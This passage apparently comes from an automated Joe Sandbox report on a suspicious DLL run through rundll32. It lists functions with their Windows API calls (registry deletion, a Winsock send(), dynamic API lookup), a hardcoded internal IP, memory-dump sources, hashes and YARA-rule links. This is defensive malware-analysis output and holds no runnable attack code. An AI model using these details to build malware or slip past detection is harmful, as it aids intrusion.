                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: Edit
                                                                                                                                    • API String ID: 0-554135844
                                                                                                                                    • Opcode ID: aeba8321252689d607d43ce831c94e9037d76912a5b48d9cd96901cd2708aa45
                                                                                                                                    • Instruction ID: d7da207644b64a2d982eb74dcfc255ba7c8492391b78acd90f64b6ebdbaccf44
                                                                                                                                    • Opcode Fuzzy Hash: aeba8321252689d607d43ce831c94e9037d76912a5b48d9cd96901cd2708aa45
                                                                                                                                    • Instruction Fuzzy Hash: 5401C034B00222ABEA50DA35DC45B5AB6F9EF4E795F120524F512EE0A1DF70ECC1C666
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 10023C5A Relevance: 7.6, APIs: 5, Instructions: 108windowthreadCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • __EH_prolog3.LIBCMT ref: 10023C61
                                                                                                                                    • SendMessageA.USER32 ref: 10023CD9
                                                                                                                                    • GetBkColor.GDI32(?), ref: 10023CE2
                                                                                                                                    • GetTextColor.GDI32(?), ref: 10023CEE
                                                                                                                                    • GetThreadLocale.KERNEL32(0000F1C0,00000000,?,?,00000014), ref: 10023D80
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Color$H_prolog3LocaleMessageSendTextThread
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 187318432-0
                                                                                                                                    • Opcode ID: 22d64082b81602bfd0fc9dbcb24da953966e1acb36a79bd38355d93537422c11
                                                                                                                                    • Instruction ID: d28fad7a3843e667b269742353e4bf680cf5f7ebce9377355bc1d9e2da6f7a14
                                                                                                                                    • Opcode Fuzzy Hash: 22d64082b81602bfd0fc9dbcb24da953966e1acb36a79bd38355d93537422c11
                                                                                                                                    • Instruction Fuzzy Hash: 99416A38400746DFCB20DF64D845A9EB7F1FF08310F618959F9969B2A1EB74E941CB51
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 10016461 Relevance: 7.6, APIs: 5, Instructions: 75registryCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • __EH_prolog3_catch.LIBCMT ref: 10016480
                                                                                                                                    • RegOpenKeyA.ADVAPI32(?,00000000,?), ref: 1001649F
                                                                                                                                    • RegEnumKeyA.ADVAPI32(?,00000000,00000000,00000104), ref: 100164BD
                                                                                                                                    • RegDeleteKeyA.ADVAPI32(?,?), ref: 10016538
                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 10016543
                                                                                                                                      • Part of subcall function 10013820: _DebugHeapAllocator.LIBCPMTD ref: 10013875
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AllocatorCloseDebugDeleteEnumH_prolog3_catchHeapOpen
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 69039007-0
                                                                                                                                    • Opcode ID: 0669dfe3de0cc61b0444232be26762e4236a4070ce21c008c0579ea5e657dd0e
                                                                                                                                    • Instruction ID: 2ee7fd04e7e526f2a2658ba16ac7fadb449e12f7dad9b6db0157347413a913f7
                                                                                                                                    • Opcode Fuzzy Hash: 0669dfe3de0cc61b0444232be26762e4236a4070ce21c008c0579ea5e657dd0e
                                                                                                                                    • Instruction Fuzzy Hash: 3A21D075D0025ADBDB21CB94CC416EEB7B0EF08350F10412AED41AB290EB30AE84DBA1
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1002B3A9 Relevance: 7.6, APIs: 5, Instructions: 58COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GetMapMode.GDI32(?), ref: 1002B3B9
                                                                                                                                    • GetDeviceCaps.GDI32(?,00000058), ref: 1002B3F3
                                                                                                                                    • GetDeviceCaps.GDI32(?,0000005A), ref: 1002B3FC
                                                                                                                                      • Part of subcall function 1001ED4C: MulDiv.KERNEL32 ref: 1001ED8C
                                                                                                                                      • Part of subcall function 1001ED4C: MulDiv.KERNEL32 ref: 1001EDA9
                                                                                                                                    • MulDiv.KERNEL32 ref: 1002B420
                                                                                                                                    • MulDiv.KERNEL32 ref: 1002B42B
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CapsDevice$Mode
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 696222070-0
                                                                                                                                    • Opcode ID: ad45f33bd95501225e01621eadf3d29f248a2335d01e386e7c92b4ca8057da2f
                                                                                                                                    • Instruction ID: 63e99b0baf6d5dcfdd2b5bb48b7ec33f4fcd9c2a57d1919fdecc035dbf7e745c
                                                                                                                                    • Opcode Fuzzy Hash: ad45f33bd95501225e01621eadf3d29f248a2335d01e386e7c92b4ca8057da2f
                                                                                                                                    • Instruction Fuzzy Hash: 2D110E71600A14EFDB21AF55CC84C0EBBE9EF89350B514829FA8597361DB31ED01CF90
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1002B437 Relevance: 7.6, APIs: 5, Instructions: 58COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GetMapMode.GDI32(?), ref: 1002B447
                                                                                                                                    • GetDeviceCaps.GDI32(?,00000058), ref: 1002B481
                                                                                                                                    • GetDeviceCaps.GDI32(?,0000005A), ref: 1002B48A
                                                                                                                                      • Part of subcall function 1001ECE3: MulDiv.KERNEL32 ref: 1001ED23
                                                                                                                                      • Part of subcall function 1001ECE3: MulDiv.KERNEL32 ref: 1001ED40
                                                                                                                                    • MulDiv.KERNEL32 ref: 1002B4AE
                                                                                                                                    • MulDiv.KERNEL32 ref: 1002B4B9
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CapsDevice$Mode
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 696222070-0
                                                                                                                                    • Opcode ID: 6f199a3495fbdd21d567dc82426adb66683fca9deaa291746216ef97ded9c58c
                                                                                                                                    • Instruction ID: 3f65263faca37ec2066e18a28c5c11a55be6ae6448755079bbf75ecdaa8dd8b2
                                                                                                                                    • Opcode Fuzzy Hash: 6f199a3495fbdd21d567dc82426adb66683fca9deaa291746216ef97ded9c58c
                                                                                                                                    • Instruction Fuzzy Hash: 2511CE75600A14EFDB21AF55CC84C1EBBEAEF89750B118819FA8597361DB31EC01DB90
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 100203DD Relevance: 7.6, APIs: 5, Instructions: 53stringCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • lstrlenA.KERNEL32(?), ref: 10020407
                                                                                                                                    • _memset.LIBCMT ref: 10020424
                                                                                                                                    • GetWindowTextA.USER32(?,00000000,00000100), ref: 1002043E
                                                                                                                                    • lstrcmpA.KERNEL32(00000000,?), ref: 10020450
                                                                                                                                    • SetWindowTextA.USER32(?,?), ref: 1002045C
                                                                                                                                      • Part of subcall function 100201F1: __CxxThrowException@8.LIBCMT ref: 10020205
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: TextWindow$Exception@8Throw_memsetlstrcmplstrlen
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 289641511-0
                                                                                                                                    • Opcode ID: 77b0c5cd9ac0cc3ff83a367ab42858fc436f0c74e7fc05fbf85526c4b9223b41
                                                                                                                                    • Instruction ID: 8c1f3c136944a2c7f84d91cd4eaa34ef9436e2c15ebeed6ca137d0836ccfc0fa
                                                                                                                                    • Opcode Fuzzy Hash: 77b0c5cd9ac0cc3ff83a367ab42858fc436f0c74e7fc05fbf85526c4b9223b41
                                                                                                                                    • Instruction Fuzzy Hash: CE01DBB5600314A7E711DF64DDC4BDF77ADEB19341F408065F646D3142EAB09E448B61
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 100329FD Relevance: 7.5, APIs: 5, Instructions: 43threadCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 100310AD: _doexit.LIBCMT ref: 100310B5
                                                                                                                                    • ___set_flsgetvalue.LIBCMT ref: 10032A0A
                                                                                                                                      • Part of subcall function 10035135: TlsGetValue.KERNEL32 ref: 1003513B
                                                                                                                                      • Part of subcall function 10035135: __decode_pointer.LIBCMT ref: 1003514B
                                                                                                                                      • Part of subcall function 10035135: TlsSetValue.KERNEL32(00000000,1003580D,?,00000001,00000001,10035A23,00000018,10050CC8,0000000C,10035AB2,00000001,00000001,?,10035387,0000000D,10050C60), ref: 10035158
                                                                                                                                      • Part of subcall function 1003511A: TlsGetValue.KERNEL32 ref: 10035124
                                                                                                                                    • __freefls@4.LIBCMT ref: 10032A60
                                                                                                                                      • Part of subcall function 1003515F: __decode_pointer.LIBCMT ref: 1003516D
                                                                                                                                    • GetLastError.KERNEL32(00000000,?,00000000,?,?), ref: 10032A32
                                                                                                                                    • ExitThread.KERNEL32 ref: 10032A39
                                                                                                                                    • GetCurrentThreadId.KERNEL32(00000000,?,00000000,?,?), ref: 10032A3F
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Value$Thread__decode_pointer$CurrentErrorExitLast___set_flsgetvalue__freefls@4_doexit
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2731880238-0
                                                                                                                                    • Opcode ID: ae3910c06ee5840ca0e9954760db7c1db5c6932cf2e7a7bf95a1dcd3ebd7d57f
                                                                                                                                    • Instruction ID: 3ca39206478dd66d9189836c3fdd0f1ffde406c57308cf63c3fc949a3eb6cb77
                                                                                                                                    • Opcode Fuzzy Hash: ae3910c06ee5840ca0e9954760db7c1db5c6932cf2e7a7bf95a1dcd3ebd7d57f
                                                                                                                                    • Instruction Fuzzy Hash: 9F015E784046519FDB06EBA1DE4594E7BA9EF48243F208458E905CF232DB35E841CB52
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 10012890 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 123COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 100134C0: GetSystemMenu.USER32 ref: 100134D2
                                                                                                                                    • GetWindowLongA.USER32(?,000000F0), ref: 1001295E
                                                                                                                                    • SetWindowLongA.USER32 ref: 10012989
                                                                                                                                      • Part of subcall function 10013460: AppendMenuA.USER32(?,00000000,00000065,00000000), ref: 1001347A
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: LongMenuWindow$AppendSystem
                                                                                                                                    • String ID: 192.168.3.85$Message
                                                                                                                                    • API String ID: 4121476972-856608562
                                                                                                                                    • Opcode ID: 3a485f645eb87c5dda0d91dee484213725162975b6f285bf4b629bdff528d801
                                                                                                                                    • Instruction ID: 340d0da2b4c657a0b825359f55c53a9166b08011863532f0c2811cf24d97780a
                                                                                                                                    • Opcode Fuzzy Hash: 3a485f645eb87c5dda0d91dee484213725162975b6f285bf4b629bdff528d801
                                                                                                                                    • Instruction Fuzzy Hash: F2411B74A4020A9BDB04DB94CCA2FBFB771EF44714F108228F5226F2D2DB75A945CB54
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 10013010 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 108memorynetworkCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 1001E3AC: __EH_prolog3.LIBCMT ref: 1001E3B3
                                                                                                                                      • Part of subcall function 1001E3AC: GetWindowTextA.USER32(?,?,?), ref: 1001E3C9
                                                                                                                                      • Part of subcall function 1001DDF4: IsWindow.USER32(?), ref: 1001DE03
                                                                                                                                    • _DebugHeapAllocator.LIBCPMTD ref: 100130B2
                                                                                                                                      • Part of subcall function 10013820: _DebugHeapAllocator.LIBCPMTD ref: 10013875
                                                                                                                                    • _strcat.LIBCMT ref: 1001310A
                                                                                                                                      • Part of subcall function 100137A0: SendMessageA.USER32 ref: 100137BB
                                                                                                                                    • send.WS2_32(?,?,00000064,00000000), ref: 10013195
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AllocatorDebugHeapWindow$H_prolog3MessageSendText_strcatsend
                                                                                                                                    • String ID: :
                                                                                                                                    • API String ID: 16450322-3653984579
                                                                                                                                    • Opcode ID: 13b8f6eccedc4ccdf4080b13ffaaa0417b73d22118cf8ccc7af144c890aa7e78
                                                                                                                                    • Instruction ID: f6b77999ec19404b7b7ce6cfec7bf3295ff1974a42ab232d1976716b8ec2d843
                                                                                                                                    • Opcode Fuzzy Hash: 13b8f6eccedc4ccdf4080b13ffaaa0417b73d22118cf8ccc7af144c890aa7e78
                                                                                                                                    • Instruction Fuzzy Hash: 01410DB59001189FDB24DB64CC91BEEB775FF44304F5082ADE51AA7282DF346A85CF54
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1001C1A0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 39libraryloaderCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 10020E5D: EnterCriticalSection.KERNEL32(10057798,?,?,?,?,1002074A,00000010,00000008,1001FA2A,1001F9CD,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 10020E99
                                                                                                                                      • Part of subcall function 10020E5D: InitializeCriticalSection.KERNEL32(?,?,?,?,?,1002074A,00000010,00000008,1001FA2A,1001F9CD,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 10020EA8
                                                                                                                                      • Part of subcall function 10020E5D: LeaveCriticalSection.KERNEL32(10057798,?,?,?,?,1002074A,00000010,00000008,1001FA2A,1001F9CD,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 10020EB5
                                                                                                                                      • Part of subcall function 10020E5D: EnterCriticalSection.KERNEL32(?,?,?,?,?,1002074A,00000010,00000008,1001FA2A,1001F9CD,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 10020EC1
                                                                                                                                      • Part of subcall function 1002072F: __EH_prolog3_catch.LIBCMT ref: 10020736
                                                                                                                                      • Part of subcall function 100201F1: __CxxThrowException@8.LIBCMT ref: 10020205
                                                                                                                                    • GetProcAddress.KERNEL32(00000000,HtmlHelpA,Function_0001B602,0000000C), ref: 1001C1E4
                                                                                                                                    • FreeLibrary.KERNEL32(?), ref: 1001C1F4
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CriticalSection$Enter$AddressException@8FreeH_prolog3_catchInitializeLeaveLibraryProcThrow
                                                                                                                                    • String ID: HtmlHelpA$hhctrl.ocx
                                                                                                                                    • API String ID: 3274081130-63838506
                                                                                                                                    • Opcode ID: c4ff01ed609920668b45cb7a661f9e4cbf771a6b1ff00103ddf750d8f10613a5
                                                                                                                                    • Instruction ID: 160066d18b9ed5655b72b10460cb3280c451ea5be833735a295996cf30cd07f4
                                                                                                                                    • Opcode Fuzzy Hash: c4ff01ed609920668b45cb7a661f9e4cbf771a6b1ff00103ddf750d8f10613a5
                                                                                                                                    • Instruction Fuzzy Hash: AB01F431044706EFE721DFA0AE06F4B7AD5FF04B42F114819F48B98452D770E890AA26
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1003CB01 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37libraryloaderCOMMONLIBRARYCODE
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GetModuleHandleA.KERNEL32(KERNEL32,10033B0B), ref: 1003CB06
                                                                                                                                    • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 1003CB16
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AddressHandleModuleProc
                                                                                                                                    • String ID: IsProcessorFeaturePresent$KERNEL32
                                                                                                                                    • API String ID: 1646373207-3105848591
                                                                                                                                    • Opcode ID: dc24b012ca1fb4bb896a1dc56100cb90a959cbbb7befe9f8aa549c159bb80eea
                                                                                                                                    • Instruction ID: 56947a08a2dfe052dc663468ef672e03bc5ef0643ca607e86d2238c745675855
                                                                                                                                    • Opcode Fuzzy Hash: dc24b012ca1fb4bb896a1dc56100cb90a959cbbb7befe9f8aa549c159bb80eea
                                                                                                                                    • Instruction Fuzzy Hash: EDF0362090091DE6EF01AFA1AD4969F7A74FB45747F510594E592F0094EF7081B49356
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 100026D0 Relevance: 6.4, APIs: 5, Instructions: 118COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • SetLastError.KERNEL32(0000007F), ref: 100026FF
                                                                                                                                    • SetLastError.KERNEL32(0000007F), ref: 1000272B
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ErrorLast
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1452528299-0
                                                                                                                                    • Opcode ID: c9d272d6c554433b4f74cd5ef5cb02bf0863a661864ac41ad17d6d3c26d06b94
                                                                                                                                    • Instruction ID: 8e64829365f1e03862022e03b3a1730166a9b8a5af119672a2ae158ec68dc0e1
                                                                                                                                    • Opcode Fuzzy Hash: c9d272d6c554433b4f74cd5ef5cb02bf0863a661864ac41ad17d6d3c26d06b94
                                                                                                                                    • Instruction Fuzzy Hash: 15511774E0411AEFEB04CF94C980AAEB7F1FF48344F208568E819AB345D774EA41DB91
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 10028638 Relevance: 6.3, APIs: 4, Instructions: 309memoryCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Task$AllocFreeH_prolog3_malloc_memset
                                                                                                                                    • String ID:
